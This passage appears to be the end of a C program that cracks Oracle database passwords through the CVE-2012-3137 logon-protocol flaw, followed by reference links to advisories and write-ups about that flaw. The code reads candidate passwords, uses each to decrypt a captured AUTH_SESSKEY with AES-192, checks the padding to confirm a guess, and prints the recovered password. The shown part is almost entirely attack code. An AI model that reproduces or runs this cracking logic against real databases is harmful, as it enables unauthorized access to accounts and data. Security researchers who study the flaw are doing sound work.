        memset (aes_key_bytes,0,sizeof(aes_key_bytes));
        memcpy (aes_key_bytes,Oracle_MixCaseHash, 20);

        if (debug)
            hexdump(stdout, "aes_key_bytes", aes_key_bytes, sizeof(aes_key_bytes));

        memset (decrypted_server_sesskey, 0, sizeof(decrypted_server_sesskey));
        ORACLE_TNS_Decrypt_AES192_CBC (aes_key_bytes, AUTH_SESSKEY, 48, decrypted_server_sesskey);

        if (debug)
            hexdump(stdout, "decrypted_server_sesskey", decrypted_server_sesskey, sizeof(decrypted_server_sesskey));

        ret = strncmp(&decrypted_server_sesskey[40], "\x08\x08\x08\x08\x08\x08\x08\x08", 8);

        if (ret == 0) { 
            printf ("\nFound password: %s \n\n", password);
            return 0;
        }

        memset(password, 0, sizeof(password));

    }

    fclose(fp);
    return 0;
}

参考链接

• http://threatpost.com/en_us/blogs/flaw-oracle-logon-protocol-leads-easy-password-cracking-092012
• http://www.soonerorlater.hu/index.khtml?article_id=512
• http://marcel.vandewaters.nl/oracle/security/cryptographic-flaws-in-oracle-database-authentication-protocol
• http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-3137
• http://www.openwall.com/lists/john-users/2012/09/28/1
• http://marcel.vandewaters.nl/oracle/security/password-hashes